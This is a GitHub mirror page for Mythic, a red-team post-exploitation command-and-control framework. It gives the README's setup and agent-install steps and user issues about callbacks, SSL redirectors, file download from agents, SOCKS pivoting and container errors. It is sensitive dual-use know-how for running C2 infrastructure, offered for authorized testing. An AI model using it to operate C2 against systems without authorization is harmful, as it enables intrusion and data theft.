its-a-feature / mythic Goto Github PK

A collaborative, multi-platform, red teaming framework

License: Other

Python 0.05% JavaScript 51.81% HTML 4.14% Shell 0.05% Dockerfile 0.17% CSS 2.19% Makefile 0.11% Go 39.08% Jupyter Notebook 2.39%

mythic's Introduction

Mythic

A cross-platform, post-exploit, red teaming framework built with GoLang, docker, docker-compose, and a web browser UI. It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout red teaming.

Starting Mythic

Mythic is controlled via the mythic-cli binary. To generate the binary, run sudo make from the main Mythic directory. From there, you can run sudo ./mythic-cli start to bring up all default Mythic containers.

More specific setup instructions, configurations, examples, screenshots, and more can be found on the Mythic Documentation website.

Installing Agents and C2 Profiles

The Mythic repository itself does not host any Payload Types or any C2 Profiles. Instead, Mythic provides a command, ./mythic-cli install github <url> [branch name] [-f], that can be used to install agents into a current Mythic instance.

Payload Types and C2 Profiles can be found on the overview page.

To install an agent, simply run the script and provide an argument of the path to the agent on GitHub:

sudo ./mythic-cli install github https://github.com/MythicAgents/apfell

The same is true for installing C2 Profiles:

sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http

This allows the agents and c2 profiles to be updated at a much more regular pace and separates out the Mythic Core components from the rest of Mythic.

Updating

Use the ./mythic-cli update command to check for available updates across mythic-cli, mythic_server, and mythic_react's UI. This will NOT do the update for you, but let you know if an update exists. To check for updates against a specific branch, use ./mythic-cli update -b [branch name].

Mythic Docker Containers

Mythic uses Docker and Docker-compose for all of its components, which allows Mythic to provide a wide range of components and features without having requirements exist on the host. However, it can be helpful to have insight into how the containers are configured. All of Mythic's docker containers are hosted on DockerHub under itsafeaturemythic.

Additionally, Mythic uses a custom PyPi package (mythic_container) and a custom Golang package (https://github.com/MythicMeta/MythicContainer) to help control and sync information between all the containers as well as providing an easy way to script access to the server.

Dockerfiles for each of these Docker images can be found on MythicMeta.

mythic-container PyPi

The mythic-container PyPi package source code is available on MythicMeta and is automatically installed on all of the mythic_python_* Docker images.

This PyPi package is responsible for connecting to RabbitMQ, syncing your data to Mythic, and responding to things like Tasking, Webhooks, and configuration updates.

github.com/MythicMeta/MythicContainer

The github.com/MythicMeta/MythicContainer Golang package source code is available on MythicMeta.

This Golang package is responsible for connecting to RabbitMQ, syncing your data to Mythic, and responding to things like Tasking, Webhooks, and configuration updates.

Mythic Scripting

Scripting source code (https://github.com/MythicMeta/Mythic_Scripting)

Documentation

All documentation for the Mythic project is being maintained on the docs.mythic-c2.net website.

Contributions

A bunch of people have suffered through bug reports, changes, and fixes to help make this project better. Thank you!

The following people have contributed a lot to the project. As you see their handles throughout the project on Payload Types and C2 Profiles, be sure to reach out to them for help and contributions:

Liability

This is an open source project meant to be used with authorization to assess the security posture and for research purposes.

Historic References

Check out a series of YouTube videos showing how Mythic looks/works and highlighting a few key features
Check out the blog post on the rebranding.
BSides Seattle 2019 Slides: Ready Player 2: Multiplayer Red Teaming against macOS
BSides Seattle 2019 Demo Videos: Available on my Youtube
Objective By the Sea 2019 talk on JXA: https://objectivebythesea.com/v2/talks/OBTS_v2_Thomas.pdf
Objective By the sea 2019 Video: https://www.youtube.com/watch?v=E-QEsGsq3uI&list=PLliknDIoYszvTDaWyTh6SYiTccmwOsws8&index=17

File Icon Attribution

bin/txt file icons - created by Icon home - Flaticon

mythic's People

Contributors

Stargazers

Watchers

Forkers

fuckup1337 techlord-rce lovebair2022 dothanthitiendiettiende w00t3k mrtaheramine jack51706 r0ug3 3453-315h seabreg sbambach deepzec rajivraj tim1512 gronau-it-cloud-computing 1052847690 ro9ueadmin minkione orf53975 c4nnibal jackson5sec firefalc0n heruix krared beerandgin superf0sh lorentzenman topotam superdong0 laudarch gavz t94j0 hsis007 icebearfriend nickhakkz keystroke95 cat-alyst t0mcat3r fzxcp3 evilsomething dviros blackap3rture 0xa-saline johndoex1 nothingcw analyticsearch hello-xbugs chouaibhm slooppe shantanu561993 jlarvie backwardn m00zh33 akshayjaing redskysec killvxk attackgithub wenki96 020monkey hbxc0re lazerhawk tobey123 sathishdsgithub acv147258369 pandapentest arturk 1nd0 m4rm0k rolen triplekill evrohachik pickfordmatt red-infosec atropineal 3ur0c3nt5y wolfking2 douwanhu ikszero 5l1v3r1 johnwax nrojas9 ajohnston9 redteamoperations bharadwajyas mmg1 sid511 invokethreatguy hackdou oldsecureiqlab gameofwar12 askyeye l1ves marciopocebon kz9 pegasusx jbisterfeldt a7t0fwa7 notoriousrebel xzvb12 xorrior

mythic's Issues

runassembly stripping backslashes from arguments

arguments to runassembly have their backslashes stripped

e.g. trying to run an assembly run.exe with the argument "dir c:\test", the assembly receives the following args "dir c:test"

having a crack at isolating the issue, not having much luck

Unable to get callback from remote system

managed to set it up and execute the payloads on the remote system however I'm unable to get the call back. How does one setup the listener? I've generated payloads using the default everything ie port 80 but nothing. I'm able to curl the payload from the remote host however when i execute the the payload on the remote system, there's no callback. I think I might be missing the setting up the listener phase.

Reduce docker image

@its-a-feature

At present, the image files are getting larger and larger, occupying more than 20G of disk space, which is very surprising. It is recommended to unify the images.

docker containers don't bind on any ports

After following the documentation of Apfell, I found that the docker containers don't bind on any port:

Core apfell services: apfell_apfell, apfell_postgres, apfell_rabbitmq
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c777b502c474 apfell_apfell "./wait-for-postgres…" 3 minutes ago Up 3 minutes apfell_apfell
d0a85c33b245 apfell_postgres "docker-entrypoint.s…" 13 minutes ago Up 3 minutes apfell_postgres
192e428face0 apfell_rabbitmq "/init.sh" 13 minutes ago Up 3 minutes apfell_rabbitmq

C2_Profile endpoints
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
24a3d2f84b45 restfulpatchthrough "/Apfell_service/c2_…" 3 minutes ago Up 3 minutes restfulpatchthrough

Payload Type Endpoints
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
88d07a979d80 viper "/Apfell_service/pay…" 3 minutes ago Up 3 minutes viper
fea2cdecdb4f linfell "/Apfell_service/pay…" 3 minutes ago Up 3 minutes linfell
be3baf84b782 apfell-jxa "/Apfell_service/pay…" 3 minutes ago Up 3 minutes apfell-jxa

Token Expiration

Hi @its-a-feature,

For generated Token for user. When i created a new token and use it - it expired after 8 hours (already try the Re-active De-active features but didn't work for expired token) .I checked the change logs and got this in version 1.4 .
"8hr default token expiration and browser will auto-renew periodically so that there are fewer interruptions in longer ops"

Is there anyway we can separate the token generate for browser and permanently token ?

Thanks and Regards,

Feature request SOCKS proxy for 1.5

It's already listed as a feature for 1.5, but I would like to vote for it explicitly! :)

Currently for Apfell JXA agents we SSH out from the compromised client device to a server we control in order to establish a reverse SOCKS pivot, but in-C2 SOCKS would be a very welcome addition since it does not introduce new egress indicators (apart from frequency/volume, obviously), and has a certainty of egress that SSH does not.

Also, is there any known approximate ETD for Apfell 1.5?

Thank you for your excellent work on Apfell!

Poseidon ps command issues - fix included here

During some of my testing of the poseidon ps command I noticed a strange issue related to nil values appearing where they should not be. From stack trace I and (mostly) lesnuages found that the error was related to the function _requestProcessArgumentsAndEnvironment inside of https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/poseidon/agent_code/ps/rdprocess_darwin.m. We guessed that the issue was on line 520, aka the code

[tmp_env setObject: [value stringByAddingPercentEscapesUsingEncoding: NSUTF8StringEncoding]
			            forKey: parts[0]];

Changing this code to

if (parts[0] != nil){
			[tmp_env setObject: [value stringByAddingPercentEscapesUsingEncoding: NSUTF8StringEncoding]
			            forKey: parts[0]];
			}

seems to resolve the issue, by making sure parts[0] is never equal to a nil value. This is a problem because if parts[0] does equal nil it can cause a crash to a poseidon agent and kill access.

Feature Request: Default webhook for all operations and potentially eliminate requirement for debian/ubuntu.

Would it be possible to implement an option for a default webhook for all operations in the mythic-docker/config.json file?
I've found a solution leveraging psql to update the database and change the webhook across all ops, but a default would be really nice.

Also, it would appear the installation and startup scripts were created specifically to support debian/ubuntu. I had interest in getting this working in google container optimized OS on GCP and found some minor tweaks to the startup and shutdown scripts were necessary but definitely possible to get it working. Since Mythic is entirely container based it's relatively simple to use other containers for some of these missing dependencies.

For example, to get around the docker-compose and jq dependencies we implemented an alias into the various startup and shutdown scripts for mythic.
Below we're leveraging the docker-compose container and the toolbox container built into container optimized os.
There is a jq container but the toolbox container was easier to use on google container optimized os.
Something like the below:

          alias docker-compose='docker run --rm \
              -v /var/run/docker.sock:/var/run/docker.sock \
              -v "$PWD:$PWD" -w="$PWD" docker/compose:latest'
          function jq() {
              if [ $# -eq 3 ]; then
                  toolbox jq $1 $2 /media/root/$(pwd)/$3 2>/dev/null
              elif [ $# -eq 2 ] && [ -f "$2" ]; then
                  toolbox jq $1 /media/root/$(pwd)/$2 2>/dev/null
              elif [ $# -eq 2 ]; then
                  read -r in
                  toolbox jq $1 $2 2>/dev/null <<<$in
              elif [ $# -eq 1 ]; then
                  read -r in
                  toolbox jq $1 2>/dev/null <<<$in
              fi
          }
          alias which='command -v'

Thanks for your consideration.

Missing Requests Import Statement in RESTful c2

The import statement from the server config:
https://github.com/its-a-feature/Apfell/blob/c4ddee87ae44c05a46c0fbb4a7891a190ec295bf/C2_Profiles/RESTful_Patchthrough/server#L10
Needs to be added to the Dockerfile:
https://github.com/its-a-feature/Apfell/blob/master/C2_Profiles/RESTful_Patchthrough/Dockerfile
RUN pip install requests

Upload command does not work.

Upload either doesn't work, or the documentation is unclear. I downloaded a file from an agent called "exfilme". Here's the output:

(Fri Mar 06 2020 11:34:50)
{
  "agent_file_id": "392a3013-93ae-4a8a-9798-8d2e3d4fbf0a",
  "chunks_received": 0,
  "cmd": "download",
  "complete": false,
  "deleted": false,
  "id": 54,
  "operation": "default",
  "operator": "apfell_admin",
  "path": "/Apfell/app/files/default/downloads/bobsmachine/exfilme",
  "task": 227,
  "timestamp": "03/06/2020 19:34:50",
  "total_chunks": 1
}
(Fri Mar 06 2020 11:34:50)
Finished download

Still nothing works for uploading. I've tried everything I can think of.

upload {"remote_path": "/home/bob/exfilme", "file_id": 54}
	- failed to get file info from the database: 'file'
upload {"remote_path": "/home/bob/exfilme", "file_id": "54"}
	- failed to get file info from the database: 'file'
upload {"remote_path": "/home/bob/exfilme", "file_id": 54, "file": "exfilme"}
	- failed to get file info from the database: 'file'
upload {"remote_path": "/home/bob/exfilme", "file": "exfilme"}
	- failed to get file info from the database
upload {"remote_path": "/home/bob/exfilme", "file_id": "392a3013-93ae-4a8a-9798-8d2e3d4fbf0a"}
	- failed to get file info from the database: 'file'
upload {"remote_path": "/home/bob/exfilme", "file": "/Apfell/app/files/default/downloads/bobsmachine/exfilme"}
	- failed to get file info from the database:

I can reference the ID in the URL but not with the upload command. I.e., this works: https://54.184.42.114/api/v1.3/files/download/392a3013-93ae-4a8a-9798-8d2e3d4fbf0a

Also despite that it can be referenced by ID as per the URL listed under Hosted Files, it does not show under hosted files.

Trying to add it manually to the Hosted Files again using the local path "/Apfell/app/files/default/downloads/bobsmachine/exfilme" fails silently.

Trying to add it with the UUID it gave fails with "failed to find that file in your operation".

Please update documentation to be more clear, and advise how to reference downloaded files.

EDIT: I am using the viper payload on a linux machine.
I can't find a version file, but my Apfell instance was installed on Jan 22, 2020

server side error while browsing to some tabs

Hello, I'm installing apfell 1.4 on ubuntu 16.04 (a clean one). Installation is smooth and server is up (I set server_ip to 127.0.0.1), however when I browse to http://127.0.0.1/payloads, there's an popup window saying "websocket closed... ".
Similar error happen on 127.0.0.1/c2profile_management, saying "failed to get the current operation". Inspecting by google chrome and have this in console:
Uncaught TypeError: Cannot convert undefined or null to object
at Function.keys ()
at get_parameter_instance_callback (c2profile_management:1766)
at XMLHttpRequest.xhr.onreadystatechange (c2profile_management:1202)

What shall I do now ? Could you please help me?

Writing own agents

Hello

A friend and me are currently working with Mythic in our Bachelor Thesis. We are writing our own agent and there might be some code we can publish afterwards. We saw you plan to write down documentation on how a GitHub repo should look like, is there already some sort of draft for that?

We are actually writing our custom Chrome Extension agent and would love some support with some further questions, unfortunately, the slack channel isn't accessible somehow.

Cheers

pull access denied for c2_profile_base

Hi,

I did an fresh installation on Ubuntu18 and during ./start_apfell.sh I get the error:

Step 1/3 : From c2_profile_base, repository does not exist or may require docker login
same for websocket:latest and payload_type_base

Afterwards, only apfell, postgres and rabbitmq containers are runnning. C2 and payload are missing.

Any hints?

Thanks,
Thomas

HTTP C2 Profile NoMatch keeps hitting ignoring message

I have tried several different VM's and get them all working using Default C2 profile and JXA-agent fine. I've used Ubuntu 18.04 and latest Kali to test out.

When using the sample HTTP C2 profile sample config.json (i updated the IP's where relevant) and the sample Agent config i cannot get a fully functional callback. i get initial callback with info (seems like the HTTP POST is fine) and then it never checks in again, and i can't issue commands. error from Sanic is: Failed to get a value: /test:string, 'Request' object has no attribute 'raw_args'

I've tried with and without encryption.

It seems like it can't seem to find the "message" value, and keeps hitting a NoMatch condition. the GET request with message in q parameter just hist nomatch.

I've tried putting the "message" all over, in body of POST, in cookie, in other GET param to no avail. Just really struggling that last few days to get a working HTTP C2 profile going. On a whim im wondering if any recent changed to the guts have caused any weirdness with HTTP C2 profile? does it still work for the world + dog and im just dumb? thanks.

Poseidon Payload Cannot Change Sleep Interval - Unmarshal error

In Apfell v1.4 while using the Poseidon payload, I am unable to run the command sleep to change the interval of check-in.

Running sleep 5 results in the following with Poseidon in Apfell v1.4

json: cannot unmarshal number into Go value of type Main.args

Installation was done by following https://docs.apfell.net/installation.

HTTP c2 profile with SSL error

I'm attempting the following setup:
Apfell-jxa -> port 443 on redirector -> port 9001 Apfell server.

I've made the following changes to the c2 profile files:

config.json
  "AgentMessage": [{
      "urls": ["https://www.exampledomain.com"],

................................
    "port": 9001,
    "key_path": "exampledomain-ssl.key",
    "cert_path": "exampledomain-cert.pem",
    "debug": true
    }
  ],
  "apfellBase": "https://localhost/api/v1.4/agent_message"
}

Agent_config.json:

  "AgentMessage": [{
      "urls": ["https://www.exampledomain.com"],

I also have the same cert (exampledomain-ssl.key, exampledomain-cert.pem) set in init.py.

however I am getting the below error when starting the internal HTTP server and executing the payload:

Output: [2020-03-13 17:33:05 +0000] [87] [ERROR] Transport closed @ ('x.x.x.x', 41184) and exception experienced during error handling
[2020-03-13 17:33:05 +0000] [87] [ERROR] Transport closed @ ('x.x.x.x.', 41186) and exception experienced during error handling
[2020-03-13 17:33:05 +0000] [87] [ERROR] Transport closed @ ('x.x.x.x', 41188) and exception experienced during error handling

any idea what I am missing here or what is causing this? thanks in advance.

no module named app error

hey there, when i try to run python3 server.py i get the following error:

please help.

Websocket closed. Please refresh to re-establish connections or select an active operation

System version: Ubuntu 20.04.1 LTS
Browser version: Chrome 87.0
Mythic version: 2.1.17

The error details:
No matter click on any page, it will appear Websocket closed. Please refresh to re-establish connections or select an active operation:

The error that appears in the browser is:

The results of executing ./status_check.sh are as follows:

The results of executing ./display_output.sh are as follows:

/config_rabbit.sh Mon Jan 25 08:13:03 UTC 2021 waiting for rabbitmq startup
{"Kernel pid terminated",application_controller,"{application_start_failure,rabbit,{bad_return,{{rabbit,start,[normal,[]]},{'EXIT',{error,{{shutdown,{failed_to_start_child,rabbit_memory_monitor,{badarg,[{lists,member,[disk,{error,bad_module}],[]},{rabbit_memory_monitor,init,1,[{file,\"src/rabbit_memory_monitor.erl\"},{line,111}]},{gen_server2,init_it,6,[{file,\"src/gen_server2.erl\"},{line,548}]},{proc_lib,init_p_do_apply,3,[{file,\"proc_lib.erl\"},{line,247}]}]}}},{child,undefined,rabbit_memory_monitor_sup,{rabbit_restartable_sup,start_link,[rabbit_memory_monitor_sup,{rabbit_memory_monitor,start_link,[]},false]},transient,infinity,supervisor,[rabbit_restartable_sup]}}}}}}}"}
/config_rabbit.sh Mon Jan 25 08:58:50 UTC 2021 waiting for rabbitmq startup
/config_rabbit.sh Mon Jan 25 08:58:54 UTC 2021 waiting for rabbitmq startup
/config_rabbit.sh Mon Jan 25 08:58:57 UTC 2021 waiting for rabbitmq startup
2021-01-25 08:58:59.332 [info] <0.33.0> Application lager started on node 'rabbit@my-ubuntu'
/config_rabbit.sh Mon Jan 25 08:59:01 UTC 2021 waiting for rabbitmq startup
/config_rabbit.sh Mon Jan 25 08:59:05 UTC 2021 waiting for rabbitmq startup
/config_rabbit.sh Mon Jan 25 08:59:08 UTC 2021 waiting for rabbitmq startup
/config_rabbit.sh Mon Jan 25 08:59:12 UTC 2021 waiting for rabbitmq startup
2021-01-25 08:59:13.232 [info] <0.5.0> upgrades: Backing up mnesia dir to "/var/lib/rabbitmq/mnesia/rabbit@my-ubuntu-upgrade-backup"
2021-01-25 08:59:13.254 [info] <0.5.0> upgrades: Mnesia dir backed up to "/var/lib/rabbitmq/mnesia/rabbit@my-ubuntu-upgrade-backup"
2021-01-25 08:59:14.712 [info] <0.33.0> Application jsx started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:14.746 [info] <0.33.0> Application mnesia started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:14.746 [info] <0.33.0> Application crypto started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:14.746 [info] <0.33.0> Application recon started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:14.746 [info] <0.33.0> Application cowlib started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:14.747 [info] <0.33.0> Application os_mon started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:14.747 [info] <0.33.0> Application xmerl started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:14.748 [info] <0.33.0> Application inets started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:14.748 [info] <0.33.0> Application asn1 started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:14.748 [info] <0.33.0> Application public_key started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:14.749 [info] <0.33.0> Application ssl started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:14.749 [info] <0.33.0> Application ranch started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:14.766 [info] <0.33.0> Application cowboy started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:14.767 [info] <0.33.0> Application ranch_proxy_protocol started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:14.767 [info] <0.33.0> Application rabbit_common started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:14.796 [info] <0.259.0> 
 Starting RabbitMQ 3.7.6 on Erlang 20.3.8
 Copyright (C) 2007-2018 Pivotal Software, Inc.
 Licensed under the MPL.  See http://www.rabbitmq.com/

  ##  ##
  ##  ##      RabbitMQ 3.7.6. Copyright (C) 2007-2018 Pivotal Software, Inc.
  ##########  Licensed under the MPL.  See http://www.rabbitmq.com/
  ######  ##
  ##########  Logs: <stdout>

              Starting broker...
2021-01-25 08:59:14.797 [info] <0.259.0> 
 node           : rabbit@my-ubuntu
 home dir       : /var/lib/rabbitmq
 config file(s) : /etc/rabbitmq/rabbitmq.conf
 cookie hash    : sfYyFsR3XCfSlWC+sJ487A==
 log(s)         : <stdout>
 database dir   : /var/lib/rabbitmq/mnesia/rabbit@my-ubuntu
2021-01-25 08:59:15.487 [info] <0.286.0> Memory high watermark set to 1562 MiB (1638722764 bytes) of 3907 MiB (4096806912 bytes) total
2021-01-25 08:59:15.541 [info] <0.288.0> Enabling free disk space monitoring
2021-01-25 08:59:15.541 [info] <0.288.0> Disk free limit set to 50MB
2021-01-25 08:59:15.552 [info] <0.290.0> Limiting to approx 1048476 file handles (943626 sockets)
2021-01-25 08:59:15.552 [info] <0.291.0> FHC read buffering:  OFF
2021-01-25 08:59:15.552 [info] <0.291.0> FHC write buffering: ON
2021-01-25 08:59:15.571 [info] <0.259.0> Waiting for Mnesia tables for 30000 ms, 9 retries left
2021-01-25 08:59:15.618 [info] <0.259.0> upgrades: Mnesia backup removed
2021-01-25 08:59:15.618 [info] <0.259.0> Waiting for Mnesia tables for 30000 ms, 9 retries left
2021-01-25 08:59:15.618 [info] <0.259.0> Peer discovery backend rabbit_peer_discovery_classic_config does not support registration, skipping registration.
2021-01-25 08:59:15.620 [info] <0.259.0> Priority queues enabled, real BQ is rabbit_variable_queue
2021-01-25 08:59:15.623 [info] <0.313.0> Starting rabbit_node_monitor
2021-01-25 08:59:15.658 [info] <0.259.0> message_store upgrades: 1 to apply
2021-01-25 08:59:15.658 [info] <0.259.0> message_store upgrades: Applying rabbit_variable_queue:move_messages_to_vhost_store
2021-01-25 08:59:15.659 [info] <0.259.0> message_store upgrades: No durable queues found. Skipping message store migration
2021-01-25 08:59:15.659 [info] <0.259.0> message_store upgrades: Removing the old message store data
2021-01-25 08:59:15.662 [info] <0.259.0> message_store upgrades: All upgrades applied successfully
2021-01-25 08:59:15.701 [info] <0.259.0> Management plugin: using rates mode 'basic'
2021-01-25 08:59:15.702 [info] <0.259.0> Adding vhost '/'
2021-01-25 08:59:15.737 [info] <0.353.0> Making sure data directory '/var/lib/rabbitmq/mnesia/rabbit@my-ubuntu/msg_stores/vhosts/628WB79CIFDYO9LJI6DKMI09L' for vhost '/' exists
2021-01-25 08:59:15.742 [info] <0.353.0> Starting message stores for vhost '/'
2021-01-25 08:59:15.742 [info] <0.357.0> Message store "628WB79CIFDYO9LJI6DKMI09L/msg_store_transient": using rabbit_msg_store_ets_index to provide index
2021-01-25 08:59:15.744 [info] <0.353.0> Started message store of type transient for vhost '/'
2021-01-25 08:59:15.745 [info] <0.360.0> Message store "628WB79CIFDYO9LJI6DKMI09L/msg_store_persistent": using rabbit_msg_store_ets_index to provide index
2021-01-25 08:59:15.746 [warning] <0.360.0> Message store "628WB79CIFDYO9LJI6DKMI09L/msg_store_persistent": rebuilding indices from scratch
2021-01-25 08:59:15.750 [info] <0.353.0> Started message store of type persistent for vhost '/'
2021-01-25 08:59:15.752 [info] <0.259.0> Creating user 'guest'
2021-01-25 08:59:15.756 [info] <0.259.0> Setting user tags for user 'guest' to [administrator]
2021-01-25 08:59:15.759 [info] <0.259.0> Setting permissions for 'guest' in '/' to '.*', '.*', '.*'
2021-01-25 08:59:15.763 [info] <0.398.0> started TCP Listener on [::]:5672
2021-01-25 08:59:15.770 [info] <0.259.0> Setting up a table for connection tracking on this node: 'tracked_connection_on_node_rabbit@my-ubuntu'
2021-01-25 08:59:15.773 [info] <0.259.0> Setting up a table for per-vhost connection counting on this node: 'tracked_connection_per_vhost_on_node_rabbit@my-ubuntu'
2021-01-25 08:59:15.773 [info] <0.33.0> Application rabbit started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:15.774 [info] <0.33.0> Application amqp_client started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:15.779 [info] <0.33.0> Application rabbitmq_management_agent started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:15.779 [info] <0.33.0> Application rabbitmq_web_dispatch started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:15.820 [info] <0.459.0> Management plugin started. Port: 15672
2021-01-25 08:59:15.820 [info] <0.565.0> Statistics database started.
2021-01-25 08:59:15.821 [info] <0.33.0> Application rabbitmq_management started on node 'rabbit@my-ubuntu'
2021-01-25 08:59:15.938 [info] <0.574.0> accepting AMQP connection <0.574.0> (127.0.0.1:53576 -> 127.0.0.1:5672)
2021-01-25 08:59:15.954 [error] <0.574.0> Error on AMQP connection <0.574.0> (127.0.0.1:53576 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:15.955 [info] <0.574.0> closing AMQP connection <0.574.0> (127.0.0.1:53576 -> 127.0.0.1:5672)
2021-01-25 08:59:16.071 [info] <0.589.0> accepting AMQP connection <0.589.0> (127.0.0.1:53578 -> 127.0.0.1:5672)
2021-01-25 08:59:16.073 [error] <0.589.0> Error on AMQP connection <0.589.0> (127.0.0.1:53578 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:16.074 [info] <0.589.0> closing AMQP connection <0.589.0> (127.0.0.1:53578 -> 127.0.0.1:5672)
2021-01-25 08:59:16.096 [info] <0.593.0> accepting AMQP connection <0.593.0> (127.0.0.1:53580 -> 127.0.0.1:5672)
2021-01-25 08:59:16.096 [info] <0.596.0> accepting AMQP connection <0.596.0> (127.0.0.1:53582 -> 127.0.0.1:5672)
2021-01-25 08:59:16.101 [error] <0.596.0> Error on AMQP connection <0.596.0> (127.0.0.1:53582 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:16.102 [info] <0.596.0> closing AMQP connection <0.596.0> (127.0.0.1:53582 -> 127.0.0.1:5672)
2021-01-25 08:59:16.103 [error] <0.593.0> Error on AMQP connection <0.593.0> (127.0.0.1:53580 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:16.104 [info] <0.593.0> closing AMQP connection <0.593.0> (127.0.0.1:53580 -> 127.0.0.1:5672)
/config_rabbit.sh Mon Jan 25 08:59:16 UTC 2021 rabbitmq is now running
2021-01-25 08:59:16.246 [info] <0.601.0> accepting AMQP connection <0.601.0> (127.0.0.1:53584 -> 127.0.0.1:5672)
2021-01-25 08:59:16.248 [error] <0.601.0> Error on AMQP connection <0.601.0> (127.0.0.1:53584 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:16.262 [info] <0.601.0> closing AMQP connection <0.601.0> (127.0.0.1:53584 -> 127.0.0.1:5672)
2021-01-25 08:59:16.455 [info] <0.605.0> accepting AMQP connection <0.605.0> (127.0.0.1:53586 -> 127.0.0.1:5672)
2021-01-25 08:59:16.469 [error] <0.605.0> Error on AMQP connection <0.605.0> (127.0.0.1:53586 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:16.474 [info] <0.605.0> closing AMQP connection <0.605.0> (127.0.0.1:53586 -> 127.0.0.1:5672)
2021-01-25 08:59:16.543 [info] <0.609.0> accepting AMQP connection <0.609.0> (127.0.0.1:53588 -> 127.0.0.1:5672)
2021-01-25 08:59:16.543 [info] <0.612.0> accepting AMQP connection <0.612.0> (127.0.0.1:53590 -> 127.0.0.1:5672)
2021-01-25 08:59:16.548 [error] <0.612.0> Error on AMQP connection <0.612.0> (127.0.0.1:53590 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:16.549 [info] <0.612.0> closing AMQP connection <0.612.0> (127.0.0.1:53590 -> 127.0.0.1:5672)
2021-01-25 08:59:16.552 [error] <0.609.0> Error on AMQP connection <0.609.0> (127.0.0.1:53588 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:16.552 [info] <0.609.0> closing AMQP connection <0.609.0> (127.0.0.1:53588 -> 127.0.0.1:5672)
2021-01-25 08:59:16.697 [info] <0.5.0> Server startup complete; 3 plugins started.
 * rabbitmq_management
 * rabbitmq_web_dispatch
 * rabbitmq_management_agent
 completed with 3 plugins.
2021-01-25 08:59:16.914 [info] <0.618.0> accepting AMQP connection <0.618.0> (127.0.0.1:53592 -> 127.0.0.1:5672)
2021-01-25 08:59:16.916 [error] <0.618.0> Error on AMQP connection <0.618.0> (127.0.0.1:53592 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:16.917 [info] <0.618.0> closing AMQP connection <0.618.0> (127.0.0.1:53592 -> 127.0.0.1:5672)
2021-01-25 08:59:16.958 [info] <0.622.0> accepting AMQP connection <0.622.0> (127.0.0.1:53594 -> 127.0.0.1:5672)
2021-01-25 08:59:16.960 [error] <0.622.0> Error on AMQP connection <0.622.0> (127.0.0.1:53594 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:16.961 [info] <0.622.0> closing AMQP connection <0.622.0> (127.0.0.1:53594 -> 127.0.0.1:5672)
2021-01-25 08:59:17.015 [info] <0.629.0> accepting AMQP connection <0.629.0> (127.0.0.1:53598 -> 127.0.0.1:5672)
2021-01-25 08:59:17.015 [info] <0.626.0> accepting AMQP connection <0.626.0> (127.0.0.1:53596 -> 127.0.0.1:5672)
2021-01-25 08:59:17.016 [info] <0.632.0> accepting AMQP connection <0.632.0> (127.0.0.1:53600 -> 127.0.0.1:5672)
2021-01-25 08:59:17.016 [info] <0.635.0> accepting AMQP connection <0.635.0> (127.0.0.1:53602 -> 127.0.0.1:5672)
2021-01-25 08:59:17.016 [info] <0.638.0> accepting AMQP connection <0.638.0> (127.0.0.1:53604 -> 127.0.0.1:5672)
2021-01-25 08:59:17.018 [error] <0.638.0> Error on AMQP connection <0.638.0> (127.0.0.1:53604 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:17.019 [error] <0.635.0> Error on AMQP connection <0.635.0> (127.0.0.1:53602 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:17.021 [error] <0.632.0> Error on AMQP connection <0.632.0> (127.0.0.1:53600 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:17.021 [info] <0.638.0> closing AMQP connection <0.638.0> (127.0.0.1:53604 -> 127.0.0.1:5672)
2021-01-25 08:59:17.021 [error] <0.629.0> Error on AMQP connection <0.629.0> (127.0.0.1:53598 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:17.021 [info] <0.635.0> closing AMQP connection <0.635.0> (127.0.0.1:53602 -> 127.0.0.1:5672)
2021-01-25 08:59:17.062 [info] <0.643.0> accepting AMQP connection <0.643.0> (127.0.0.1:53606 -> 127.0.0.1:5672)
